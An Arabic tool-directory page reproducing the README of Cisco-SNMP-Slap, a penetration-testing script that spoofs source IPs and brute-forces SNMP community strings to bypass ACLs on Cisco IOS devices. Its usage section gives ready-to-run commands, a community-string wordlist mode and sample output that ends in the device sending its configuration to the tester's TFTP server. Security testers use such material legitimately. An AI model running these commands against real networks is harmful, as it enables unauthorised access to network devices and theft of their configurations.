Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Cisco-SNMP-Slap — أداة انتحال عنوان IP واختراق سلاسل مجتمع SNMP بالقوة لتجاوز قوائم التحكم بالوصول (ACLs) على أجهزة Cisco IOS، وسرقة ملفات التكوين عبر TFTP. | Kitploit
أدوات/GitHubGitHub/nccgroup/cisco-snmp-slap
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكاتاختبار الاختراقالفريق الأحمر
GitHubnccgroup/cisco-snmp-slap

Cisco-SNMP-Slap

أداة انتحال عنوان IP واختراق سلاسل مجتمع SNMP بالقوة لتجاوز قوائم التحكم بالوصول (ACLs) على أجهزة Cisco IOS، وسرقة ملفات التكوين عبر TFTP.

عرض المستودع
58152منذ 11 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

OVERVIEW

cisco-snmp-slap يستخدم انتحال عنوان IP لتجاوز قائمة التحكم بالوصول (ACL) التي تحمي خدمة SNMP على جهاز Cisco IOS.

عادةً ما يكون انتحال IP ذا فائدة محدودة في الهجمات الحقيقية خارج نطاق هجمات حجب الخدمة (DoS). لا يمكن لأي خدمة TCP إكمال المصافحة الأولية. أما حزم UDP فمن الأسهل انتحالها، لكن الحزمة المرتجعة غالباً ما تُرسل إلى عنوان خاطئ، مما يصعّب جمع أي معلومات يتم إرجاعها.

ومع ذلك، إذا تمكن المهاجم من تخمين سلسلة المجتمع (community string) للقراءة والكتابة لـ SNMP وعنوان مصدر صالح، فيمكنه ضبط قيم MiBs الخاصة بـ SNMP. ومن أكثر الاستخدامات وضوحاً لذلك جعل خدمة SNMP على Cisco ترسل ملف إعدادات IOS إلى جهاز آخر.

تتيح لك هذه الأداة تجربة سلسلة مجتمع واحدة أو أكثر ضد جهاز Cisco من عنوان IP واحد أو أكثر. عند تحديد عناوين IP، يمكنك الاختيار بين المرور عبر نطاق من عناوين المصدر بشكل تسلسلي أو عشوائي.

لتحديد نطاق من عناوين IP المصدر، يتم توفير عنوان مصدر أولي وقناع IP. سيتم استخدام أي بتات مضبوطة في قناع IP لتوليد عناوين IP المصدر عن طريق تعديل عنوان المصدر الأولي.

على سبيل المثال، إذا تم توفير عنوان مصدر 10.0.0.0 مع قناع IP بقيمة 0.0.0.255، فسيستكشف السكربت العناوين من 10.0.0.0 إلى 10.0.0.255.

لا يلزم أن تكون البتات المضبوطة متتالية مثل قناع الشبكة الفرعية. على سبيل المثال، القناع 0.128.1.255 صالح وسيستكشف النطاقات 10.0,128.0-1.0-255.

عند فحص نطاق من عناوين IP بشكل عشوائي أو تسلسلي، يتطلب الأمر إدخال المسار إلى جذر دليل TFTP. سيتحقق السكربت من هذا الدليل لمعرفة ما إذا تم نقل الملف بنجاح.

أُعدّت هذه الأداة لاستهداف محولات Cisco من الطبقة الثالثة (Layer 3) أثناء اختبارات الاختراق، على الرغم من أنها قد تجد استخدامات أخرى. تعمل بشكل جيد ضد هذه الأجهزة للأسباب التالية:

  1. نادراً ما تكون محولات الطبقة الثالثة مزوّدة بالتحقق من المسار العكسي (reverse path verification) وفقاً لتجربة المؤلف
  2. لا توجد أجهزة توجيه أو أجهزة أخرى قد تكون قادرة على اكتشاف حدوث انتحال IP.

ومع ذلك، آمل أن يجد المستخدمون استخدامات أخرى مثيرة للاهتمام لهذا السكربت وشفرة مصدره.

الاستخدام

في هذا المثال سأستخدم جهاز IOS بسيطاً مع قائمة وصول تحمي خدمة SNMP باستخدام سلسلة المجتمع 'cisco'

root@kitploit:~
access-list 10 permit 10.100.100.0 0.0.0.255
snmp-server community cisco rw 10

عنوان IP الخاص بأحد أجهزة IOS هو 10.0.0.1

لدى المختبر عنوان IP 10.0.0.2 وقد قام بتشغيل خادم TFTP.

إذا كان المختبر يعرف كل هذه المعلومات، فإنه يستخدم الوضع الفردي (single) للحصول على ملف إعدادات الجهاز. مثال:

root@kitploit:~
./slap.py single cisco 10.0.0.2 10.100.100.100 10.0.0.1

إذا كان المختبر لا يعرف التفاصيل، يمكنه المحاولة والتخمين. لنفترض أن المختبر قام ببعض الاستطلاع واكتشف أن جميع العناوين الداخلية تقع في نطاق 10.0.0.0/8.

root@kitploit:~
./slap.py seqmask private 10.0.0.2 10.0.0.0 0.255.255.0 10.0.0.1 /tftproot/

سيبحث هذا الأمر عبر جميع شبكات /24، ويأمل المختبر أن يوفر بعض الوقت بافتراض أن الشبكة الفرعية بأكملها سيُسمح لها بالوصول بدلاً من عنوان IP واحد فقط.

root@kitploit:~
root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask cisco 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/
Cisco SNMP Slap,  v0.3
Darren McDonald, [email protected]

WARNING: No route found for IPv6 destination :: (no default route?)
Community String:   cisco
TFTP Server IP  :   10.0.0.2
Source IP:          10.0.0.5
Source Mask:        0.255.255.0
Destination IP:     10.0.0.1
TFTP Root Path:     /tftproot//cisco-config.txt
10.0.0.5
10.0.1.5
10.0.2.5
< ... cut for brevity ... >
10.100.99.255
10.100.100.0
10.100.100.1
10.100.100.2
10.100.100.3
10.100.100.4
10.100.100.5
10.100.100.6
Success!

ستلاحظ أن البرنامج يخرج ويعلن النجاح بعد عدة عناوين IP بعد دخوله إلى نطاق 10.100.100.0/24. وذلك لأنه ليس من الممكن تحديد أي عنوان مصدر نجح، لكنه يحدد أن أحد الطلبات نجح بعد ظهور ملف الإعدادات في مجلد tftproot. وبما أنك حصلت للتو على الإعدادات الجارية، يمكنك الآن معرفة تفاصيل قائمة ACL بنفسك.

بدلاً من تحديد سلسلة مجتمع واحدة، يمكنك أيضاً تقديم قائمة يجب استخدامها. أسماء الأوضاع هي نفسها باستثناء أنها تحتوي على اللاحقة '_l'.

على سبيل المثال، لتكرار الهجوم نفسه باستخدام قائمة من سلاسل المجتمع في ملف list.txt، يجب استخدام الوسائط التالية.

root@kitploit:~
root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask_l list.txt 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/
Cisco SNMP Slap,  v0.3
Darren McDonald, [email protected]

WARNING: No route found for IPv6 destination :: (no default route?)
Community File: list.txt
TFTP Server IP  :   10.0.0.2
Source IP:  10.0.0.5
Source Mask:0.255.255.0
Destination IP: 10.0.0.1
TFTP Root Path: /tftproot//cisco-config.txt
community strings loaded:  ['private\n', 'cisco\n', 'public\n']
10.0.0.5 /  private
10.0.0.5 /  cisco
10.0.0.5 /  public
10.0.1.5 /  private
10.0.1.5 /  cisco
10.0.1.5 /  public
10.0.2.5 /  private
10.0.2.5 /  cisco
10.0.2.5 /  public
10.0.3.5 /  private
10.0.3.5 /  cisco
10.0.3.5 /  public

الآن يتم فحص كل عنوان IP مع كل سلسلة مجتمع في list.txt.

الدعم

فيما يتعلق بلغات البرمجة، فإن Python لغة بسيطة وسهلة القراءة والكتابة، وأشجعك على محاولة تصحيح أي مشاكل تجدها وإصلاحها وإرسال تغييراتك إليّ لمشاركتها مع المستخدمين الآخرين على NCC Github.

لكن إذا كنت بحاجة إلى مساعدة، يمكنك التواصل معي على [email protected]. سأبذل قصارى جهدي لمساعدتك، لكن يجب أن تعلم أنني لست مطوراً بدوام كامل (وهو ما ينبغي أن يكون واضحاً من الكود!) وقد لا يتوفر لدي وقت للرد على استفسارك فوراً.

الإصدارات

  • 0.1 الإصدار الأولي
  • 0.2 إضافة أوضاع عشوائية وتسلسلية وأقنعة عنوان المصدر
  • 0.3 إضافة ميزة قائمة ملفات سلاسل المجتمع، أول إصدار عام
  • 0.3.1 يستخدم الآن os.sep بحيث تعمل المسارات بشكل صحيح على Windows
تنزيل الأداة